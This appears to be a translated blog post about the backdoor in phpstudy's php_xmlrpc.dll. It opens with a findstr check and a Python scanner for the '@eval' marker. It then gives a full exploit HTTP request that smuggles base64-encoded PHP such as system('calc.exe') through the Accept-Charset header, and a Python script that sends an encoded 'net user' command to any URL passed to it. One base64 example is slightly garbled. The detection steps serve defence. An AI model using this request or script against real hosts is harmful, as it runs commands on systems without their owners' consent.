Recently phpstudy was reported to contain a backdoor. At the time I didn't care at all, thinking it couldn't possibly be me... and then, slap in the face.
Looking at my phpstudy2018, the database suddenly started misbehaving, and only then did I realise I had been someone else's zombie box for years...
Come and check whether your phpstudy has this backdoor too.
If you don't want to reproduce it and just want to check, open cmd and run:
cd phpstudy
findstr /m /s /c:"@eval" *.*
If it finds a match, you most likely have the backdoor; consider uninstalling and reinstalling PHP from the official site, or running 360's trojan scan.
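The same check as the findstr one-liner, as an added Python example that is not part of the original post: it walks a phpstudy install directory and reports every file containing the @eval marker (the full @eval(%s('%s')) format string, which is the more specific indicator, is tried first). The directory tree built by demo() is constructed for the example.

```python
import os
import sys
import tempfile

# Byte strings to look for. The full format string is the specific
# indicator; bare "@eval" is what the findstr one-liner matches and will
# also hit legitimate PHP source that happens to use @eval.
BACKDOOR_MARKERS = (b"@eval(%s('%s'))", b"@eval")

def find_marker(data):
    """Return the most specific marker present in data, or None."""
    for marker in BACKDOOR_MARKERS:
        if marker in data:
            return marker.decode("ascii")
    return None

def scan_tree(root):
    """Walk root (e.g. the phpstudy install directory) and return a dict of
    relative path (with '/' separators) -> marker for every file that hits."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                marker = find_marker(fh.read())
            if marker is not None:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                hits[rel] = marker
    return hits

def demo():
    """Constructed sample install tree: one clean extension DLL next to a
    php_xmlrpc.dll carrying the backdoor format string."""
    root = tempfile.mkdtemp()
    ext = os.path.join(root, "php", "php-5.2.17", "ext")
    os.makedirs(ext)
    with open(os.path.join(ext, "php_curl.dll"), "wb") as fh:
        fh.write(b"MZ\x90\x00 clean extension, nothing to see")
    with open(os.path.join(ext, "php_xmlrpc.dll"), "wb") as fh:
        fh.write(b"MZ\x90\x00 ... @eval(%s('%s')); ...")
    return scan_tree(root)

if __name__ == "__main__":
    # Pass the phpstudy directory as the first argument; with no argument
    # the constructed demo tree is scanned instead.
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for path, marker in sorted(results.items()):
        print(f"{path}: {marker}")
```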
Reproduction:
Preparation: Win10 VM, phpstudy20181102, Burp Suite for capturing requests
Locate PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
Open it in Notepad
Search for: eval, and you get: @eval(%s('%s')). If this string is present, it is basically the backdoor.
Start phpstudy; my version is php-5.4.45 + Apache
exp:
Accept-Charset is where the command gets executed: the value is the base64 encoding of system('calc.exe');
GET / HTTP/1.1
Host: localhost
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCdjYWxjLmV4ZScpOw==
Cookie: UM_distinctid=16ae380e49f27e-0987ab403bca49-3c604504-1fa400-16ae380e4a011b; CNZZDATA3801251=cnzz_eid%3D1063495559-1558595034-%26ntime%3D1559102092; CNZZDATA1670348=cnzz_eid%3D213162126-1559207282-%26ntime%3D1559207282
Connection: close
Send the request to execute it.
To execute phpinfo(); instead:
base64-encode it ----> cGhwaW5mbyUyOCUyOSUzQg==
Besides the phpstudy 2018 version, the phpstudy 2016 version is affected as well:
Phpstudy 2016: php-5.4
Phpstudy 2018: php-5.2.17
Phpstudy 2018: php-5.4.45
Backdoor path: \php\php-5.2.17\ext\php_xmlrpc.dll
Verification script:
# -*- coding: utf-8 -*-
import requests
import sys
import base64

def Poc(ip):
    # Harmless marker payload: the backdoor simply echoes the string back.
    payload = "echo \"hello phpstudy\";"
    # Base64 of: echo system("net user");  (the payload that is actually sent)
    poc = "ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7"
    pay = base64.b64encode(payload.encode('utf-8'))
    # Uncomment to send the harmless echo payload instead:
    #poc = str(pay, "utf-8")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Connection": "close",
        "Accept-Encoding": "gzip,deflate",
        # The backdoored php_xmlrpc.dll base64-decodes this header and eval()s it
        "Accept-Charset": poc,
        "Upgrade-Insecure-Requests": "1",
    }
    url = ip
    r = requests.get(url, headers=headers)
    #print(r.text)
    # The original condition `"Administrator" or "DefaultAccount" or ... in r.text`
    # was always true (non-empty string literals are truthy), so every host was
    # reported as backdoored. Test each marker against the response body instead:
    # the first three come from `net user` output, the last from the echo payload.
    markers = ("Administrator", "DefaultAccount", "Guest", "hello phpstudy")
    if any(m in r.text for m in markers):
        print("存在phpstudy后门")
    else:
        print("不存在phpstudy后门")

if len(sys.argv) < 2:
    print("python phpstudy.py http://127.0.0.1")
else:
    Poc(sys.argv[1])
Fix: 360 (an honest vendor)